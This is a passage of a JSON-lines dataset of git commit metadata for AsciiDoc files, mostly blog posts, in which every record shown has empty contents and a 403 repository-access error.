Speaker!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-29-Turn-Any-Bottle-Into-A-Speaker.adoc","new_file":"_posts\/2016-10-29-Turn-Any-Bottle-Into-A-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f63f64a7e11b9370b83a2e875caea71c375a76ff","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 
2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca0ac3873dc3a6dc33c0982137fddd6decc2bb92","subject":"Renamed '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc' to '_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","message":"Renamed '_posts\/2019-09-31-CSAW-CTF-2017-Qual-Serial-Misc50.adoc' to '_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11264d902bdc4d5ad705e0a4eb9088b1a67ab198","subject":"y2b create post Google Pixel 2 Event Live Stream","message":"y2b create post Google Pixel 2 Event Live Stream","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-04-Google-Pixel-2-Event-Live-Stream.adoc","new_file":"_posts\/2017-10-04-Google-Pixel-2-Event-Live-Stream.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8dd8d0f7d9d0af01f58335d2dbf3c83ab171b0","subject":"Update 2015-09-15-ASCiiDOC.adoc","message":"Update 2015-09-15-ASCiiDOC.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-15-ASCiiDOC.adoc","new_file":"_posts\/2015-09-15-ASCiiDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9998c664d561d5a78dbabce06f1af1dd80390b35","subject":"Update 2016-08-09-Test.adoc","message":"Update 2016-08-09-Test.adoc","repos":"ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog,ciena-blueplanet\/developers.blog","old_file":"_posts\/2016-08-09-Test.adoc","new_file":"_posts\/2016-08-09-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ciena-blueplanet\/developers.blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9286ba5e9bb39cd08888287ef2a25c8cdd28cdf2","subject":"range query for data repository","message":"range query for data repository\n","repos":"mygithubwork\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works,verydapeng\/boot-works","old_file":"data-rest.adoc","new_file":"data-rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable 
to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"442aa13eee3aadefdc8958b8ff7c9c74334c4010","subject":"Update 0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","message":"Update 0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","new_file":"_posts\/0000-00-00-Why-I-Have-No-Free-Time-Anymore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f947874ea6155b1beb742b68a1231bc21ca2d9c1","subject":"Update 2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","message":"Update 2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","repos":"murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io,murilo140891\/murilo140891.github.io","old_file":"_posts\/2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","new_file":"_posts\/2015-05-11-Os-sinais-de-uma-falsa-religiao.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/murilo140891\/murilo140891.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ce5c2f58c680ccd1bbc198130dde978fb6e2b8f","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b9d3e9e03cd8790bb1af70abc2bdd464da06064","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7677a3661d429f3baecbd98fd506ea0fc46623f","subject":"ISIS-1819 Where-am-I feature initial adoc","message":"ISIS-1819 Where-am-I feature initial adoc","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugvw\/_ugvw_features_where-am-i.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/ugvw\/_ugvw_features_where-am-i.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aba824b48c5ee6c5238a26627aed775866081c9","subject":"Update 2017-04-03-laravel-reminder.adoc","message":"Update 2017-04-03-laravel-reminder.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-03-laravel-reminder.adoc","new_file":"_posts\/2017-04-03-laravel-reminder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd9cd72b7ce8b9bbadee0992297202c017a21c77","subject":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","message":"Update 2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_file":"_posts\/2016-01-24-Script-for-doing-backups-on-Amazon-S3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8e7b044b1078f2bd575a5e1100ce2259ccf0efc","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20c652f0e6a39fbd613469301aec72a9e3fd29ca","subject":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","message":"Update 2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_file":"_posts\/2016-12-22-Karma-tests-fail-cant-find-variable-Map-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b27c44a2fc0a090c2c25822fd7be52891dfbc8","subject":"2016-07-09-Tiger.adoc","message":"2016-07-09-Tiger.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-09-Tiger.adoc","new_file":"_posts\/2016-07-09-Tiger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a75f71e7bbf92190dd396cb097c9257880c282aa","subject":"Update 2016-04-29-Static-Initialize-Order-Elvis.adoc","message":"Update 
2016-04-29-Static-Initialize-Order-Elvis.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2016-04-29-Static-Initialize-Order-Elvis.adoc","new_file":"_posts\/2016-04-29-Static-Initialize-Order-Elvis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23514ede8f4e79e486294ba5855bcd99daf1b188","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b376dace1a8fe6b7c11c0dd40d09102af1ccaed","subject":"Update 2017-10-16-Emacs-for-Visual-Studio-users.adoc","message":"Update 2017-10-16-Emacs-for-Visual-Studio-users.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-16-Emacs-for-Visual-Studio-users.adoc","new_file":"_posts\/2017-10-16-Emacs-for-Visual-Studio-users.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b5337d08ec2c5dda98e91d32c1471e7779291c1","subject":"v1.84","message":"v1.84\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"trex_rpc_server_spec.asciidoc","new_file":"trex_rpc_server_spec.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b8edcaab1dd464efcb1d1367fe1ec77eb55f0cc1","subject":"Update 2015-05-25-Hallo.adoc","message":"Update 2015-05-25-Hallo.adoc","repos":"rpwolff\/rpwolff.github.io,rpwolff\/rpwolff.github.io,rpwolff\/rpwolff.github.io","old_file":"_posts\/2015-05-25-Hallo.adoc","new_file":"_posts\/2015-05-25-Hallo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rpwolff\/rpwolff.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c709d2eac5fb5be94e3c6eca0e95070c19673a08","subject":"Update 2015-11-05-O-HAI.adoc","message":"Update 2015-11-05-O-HAI.adoc","repos":"silviu\/silviu.github.io,silviu\/silviu.github.io,silviu\/silviu.github.io","old_file":"_posts\/2015-11-05-O-HAI.adoc","new_file":"_posts\/2015-11-05-O-HAI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silviu\/silviu.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"402d30def215df63cdb2285b01d75781e81dce27","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e3e2fb45c7dff563c68c3fc0b75e0eb914849a5","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/readings\/the_little_prince.adoc","new_file":"content\/readings\/the_little_prince.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3949e859aa89458329c8783d38be351f0ad5f3d5","subject":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","message":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a48d9f838b9790894b6af9d547fabb12d6cccb2","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35412d1b150a2f21154fbccd33a31cae655d9e05","subject":"Small fix to first time config presentation","message":"Small fix to first time config presentation\n\nSigned-off-by: Ido Barnea <3a6e28cf60eb2f9d9d6e5ab6275926d9a599fe66@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core","old_file":"doc\/trex_config.asciidoc","new_file":"doc\/trex_config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf9bd1ecddd6ae97a03a7f4a3a26a80c41a6bcb8","subject":"final push on the annoucment post -- needs to incorporate feedback from Stu and Alex and pull out relevant bits into the guide","message":"final push on the annoucment post -- needs to incorporate feedback from Stu and Alex and pull out relevant bits into the 
guide\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/02\/tools-build.adoc","new_file":"content\/news\/2021\/07\/02\/tools-build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0b6e5c18f257b9587e15912acdbd0096a9cf0bca","subject":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","message":"Update 2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_file":"_posts\/2015-03-03-docker-asciidoctorj-wildfly-arquillian.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9d6854e8f8ee1d59720a7952abfc56a5482cf99","subject":"Update 2016-01-15-Building-and-installing-Python-modules.adoc","message":"Update 2016-01-15-Building-and-installing-Python-modules.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-15-Building-and-installing-Python-modules.adoc","new_file":"_posts\/2016-01-15-Building-and-installing-Python-modules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7eda7659683394cf4b5c67d784855be21e9ca8ab","subject":"y2b create post Testing INSANE mode on the P85D","message":"y2b create post Testing INSANE mode on the P85D","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-02-16-Testing-INSANE-mode-on-the-P85D.adoc","new_file":"_posts\/2015-02-16-Testing-INSANE-mode-on-the-P85D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e97632a67473d5251f16468d939a77568c4cf639","subject":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 9","message":"\u0410\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u0441\u043a\u0430 \u0432\u0435\u0436\u0431\u0430 9\n\n\u0421\u0440\u0435\u0434\u0435\u043d \u0435 .adoc \u0444\u0430\u0458\u043b\u043e\u0442 \u043a\u043e\u0458 \u043c\u043e\u0436\u0435 \u043d\u0435\u043a\u0430 \u0433\u043e \u0438\u0441\u043a\u043e\u043c\u043f\u0430\u0458\u043b\u0438\u0440\u0430 \u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u0438 \u0432\u043e master.","repos":"finki-mk\/OOP,finki-mk\/OOP","old_file":"docs\/src\/oop_av9.adoc","new_file":"docs\/src\/oop_av9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/finki-mk\/OOP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb95976677a94885d563011e7d8e7b79c403b56","subject":"Update 2013-04-29-Good-programmers-are-lazy.adoc","message":"Update 
2013-04-29-Good-programmers-are-lazy.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2013-04-29-Good-programmers-are-lazy.adoc","new_file":"_posts\/2013-04-29-Good-programmers-are-lazy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1420da6d8667c1afc8ce1d13cbaa2de784d4d668","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7db0a86185cd62b63e6a7ddd4a84d5a0672d41f6","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7dd86ebd3ed70f583e9667b51b41e1f623e7f60","subject":"y2b create post The $2800 Game Console You Didn't Know Existed...","message":"y2b create post The $2800 Game Console You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-06-The-2800-Game-Console-You-Didnt-Know-Existed.adoc","new_file":"_posts\/2017-11-06-The-2800-Game-Console-You-Didnt-Know-Existed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7692de771169d8364067da55a5673cdfb199e564","subject":"Delete Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","message":"Delete Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_file":"_posts\/Micro-Service-Casual-Talkadoc-Microservice-Casual-Talks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4849235270fe8f5f3eebef8850b0af216d7c3ff","subject":"The initial rough outline for a getting started 
guide.","message":"The initial rough outline for a getting started guide.\n","repos":"Rikkola\/uberfire,psiroky\/uberfire,paulovmr\/uberfire,kiereleaseuser\/uberfire,dgutierr\/uberfire,Rikkola\/uberfire,Salaboy\/uberfire,mbiarnes\/uberfire,porcelli-forks\/uberfire,porcelli-forks\/uberfire,paulovmr\/uberfire,dgutierr\/uberfire,uberfire\/uberfire,wmedvede\/uberfire,karreiro\/uberfire,mbarkley\/uberfire,ederign\/uberfire,qmx\/uberfire,porcelli-forks\/uberfire,porcelli-forks\/uberfire,paulovmr\/uberfire,Salaboy\/uberfire,Salaboy\/uberfire,uberfire\/uberfire,paulovmr\/uberfire,cristianonicolai\/uberfire,mbiarnes\/uberfire,psiroky\/uberfire,Rikkola\/uberfire,karreiro\/uberfire,Salaboy\/uberfire,psiroky\/uberfire,dgutierr\/uberfire,baldimir\/uberfire,mbiarnes\/uberfire,mbarkley\/uberfire,kiereleaseuser\/uberfire,mbarkley\/uberfire,baldimir\/uberfire,mbiarnes\/uberfire,mbarkley\/uberfire,ederign\/uberfire,wmedvede\/uberfire,paulovmr\/uberfire,ederign\/uberfire,karreiro\/uberfire,psiroky\/uberfire,Rikkola\/uberfire,kiereleaseuser\/uberfire,cristianonicolai\/uberfire,kiereleaseuser\/uberfire,qmx\/uberfire,ederign\/uberfire,qmx\/uberfire,wmedvede\/uberfire,baldimir\/uberfire,baldimir\/uberfire,uberfire\/uberfire,wmedvede\/uberfire,qmx\/uberfire,uberfire\/uberfire,cristianonicolai\/uberfire,dgutierr\/uberfire,cristianonicolai\/uberfire,karreiro\/uberfire","old_file":"uberfire-docs\/src\/main\/asciidoc\/getting-started.asciidoc","new_file":"uberfire-docs\/src\/main\/asciidoc\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Rikkola\/uberfire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"580433460eee1984cb6de9d9820ef9e78c5b9047","subject":"y2b create post World's Largest Gummy Bear (Feat. My 4 year old)","message":"y2b create post World's Largest Gummy Bear (Feat. 
My 4 year old)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-13-Worlds-Largest-Gummy-Bear-Feat-My-4-year-old.adoc","new_file":"_posts\/2014-03-13-Worlds-Largest-Gummy-Bear-Feat-My-4-year-old.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"521c035c0003b126216648c976a49d62e60eccfb","subject":"Update 2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","message":"Update 2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","new_file":"_posts\/2015-09-08-Cursos-Gratuitos-para-aprender-una-profesion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"301df0790393132a2b7fc46e00db2032edd9cef2","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 